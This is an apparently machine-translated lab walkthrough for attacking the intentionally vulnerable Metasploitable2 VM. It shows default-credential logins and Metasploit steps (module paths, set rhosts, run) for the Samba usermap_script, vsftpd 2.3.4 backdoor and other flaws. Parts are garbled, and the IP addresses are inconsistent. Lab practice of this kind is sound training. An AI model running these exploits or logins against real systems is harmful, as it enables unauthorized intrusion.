What is? Metasploitable2？

Metasploitable2 The virtual system is a specially made ubuntu operating system , It is designed as a security tool to test and demonstrate common vulnerabilities .

Use steps

Download address ：https://sourceforge.net/projects/metasploitable/files/latest/download
The default user name and password are ：msfadmin
Double click directly after downloading

The network card mode is... By default NAT Pattern (NAT Patterns and themselves wifi Same as segment , Use kali The same network segment can also be used ping through ).

Target vulnerability

Before the vulnerability test, you can scan the port

Drone aircraft ip by 192.168.126.148
kali Of ip by 192.168.126.130

1、 Weak password vulnerability

System weak password

telnet 192.168.126.148
The account and password are msfadmin

Mysql Weak password

Use mysql -h 192.168.126.148 -u root Direct login successful

PostgresQL Weak password

Use psql -h 192.168.126.147 -U postgres
password ：postgres Login successful

VNC Remote login weak password

Use vnciewer 192.168.126.148
password password Direct login

2、Samba MS-RPC Shell Command injection vulnerability

The cause of the leak ： adopt MS-RPC The unfiltered user input provided is called when the defined external script is invoked /bin/sh, stay smb.conf in , Causes remote command execution to be allowed .

1、 stay kali Enable msfconsole

2、 Search for the corresponding samba Vulnerability code search samba

3、 Use exploit/multi/samba/usermap_script

use exploit/multi/samba/usermap_script

4、 Set parameters

set rhosts 192.168.126.148

5、 Carry out orders , View directory

run
ls

3、Vsftpd The source code contains a backdoor vulnerability

Cause of vulnerability : In a particular version of vsftpd In the server program , Someone maliciously implanted code , When the user name is in “: )” At the end , The server will be in 6200 Port listening , And can execute arbitrary code

1、 stay kali Enable msfconsole

2、 Search about Vsftpd Related vulnerability libraries

search vsftpd

3、 Use exploit/unix/ftp/vsftpd_234_backdoor

use exploit/unix/ftp/vsftpd_234_backdoor

4、 Set parameters

set rhosts 192.168.126.148

5、 Carry out orders

4、UnreallRCd A hole in the back door

The cause of the leak ： stay 2009 year 11 Month to 2010 year 6 Distributed in some mirror sites during the month UnreallRCd, stay DEBUG3_DOLOG_SYSTEM Macro contains malicious code introduced from outside , Remote attackers can execute arbitrary code

Step 1 and step 2 above are not screenshots

1、 Find the corresponding module for use

2、 Set corresponding parameters

3、 perform

5、PHP CGI Parameter injection Execution Vulnerability

Introduction to loopholes :GI The script did not handle the request parameters correctly , Cause source code leak , Allows remote attackers to insert execute commands into request parameters .

1、 Find the corresponding module for use

2、 Set corresponding parameters

3、 perform

6、Ingreslock A hole in the back door

Introduction to loopholes ：Ingreslock The backdoor is listening to 1524 port , Connect to 1524 The port can be obtained directly root jurisdiction

1、 perform telnet command

2、 Execute direct successful login view permission

7、Postgres Arbitrary execution of shared library code

Introduction to loopholes ： In some default Linux Installed PostgreSQL,postgres The service account can be written to /tmp Catalog , And shared libraries , Allow arbitrary code execution

1、 Find the corresponding module for use

2、 Set corresponding parameters

3、 perform

summary ： There are also some other loopholes in the shooting range. You can refer to those compiled by other masters .